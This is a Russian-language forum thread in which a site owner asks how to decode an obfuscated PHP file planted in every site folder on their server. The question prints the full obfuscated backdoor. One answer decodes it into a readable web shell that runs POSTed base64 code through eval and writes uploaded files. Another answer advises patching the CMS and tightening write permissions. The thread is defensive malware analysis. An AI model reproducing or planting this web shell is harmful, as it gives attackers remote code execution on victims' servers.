Где можно расшифровать вирусный php код?

Всем добрый день! Злоумышленники, возможно мои бывшие хостеры, положили мне вирусный файл на сервер в каждую папочку для каждого сайта. Файл зашифрован, подскажите, может есть какие-то сервисы по расшифровке? Я, конечно, удалю этот файл с сервера, но боюсь вдруг там еще какие-то подключаются и тогда они так и останутся лежать и я не буду о них знать.
Вот такой файлик, совсем небольшой:
<?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){@$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>
  • Вопрос задан
  • 1278 просмотров
Решения вопроса 1
Rsa97
@Rsa97
Для правильного вопроса надо знать половину ответа
Такого размера файл можно и руками расшифровать, надо только немного знать PHP.
echo 7457737+736723;
eval(base64_decode($_POST['id'])));
if($_POST['up'] == 'up'){
    @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']);
};
Ответ написан
Комментировать
Пригласить эксперта
Ответы на вопрос 1
Sanasol
@Sanasol Куратор тега PHP
нельзя просто так взять и загуглить ошибку
этим занимаются боты, а не хостеры.

И делают это через известные всем дыры во всяких CMSках, особенно если не обновляться.

Лечить почти нереально, надо закрывать на запись всё что можно и нельзя на сайте, проверять потенциально опасные плагины/скрипты/обновляться до последней версии. Удалить везде и ждать появится или нет.
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы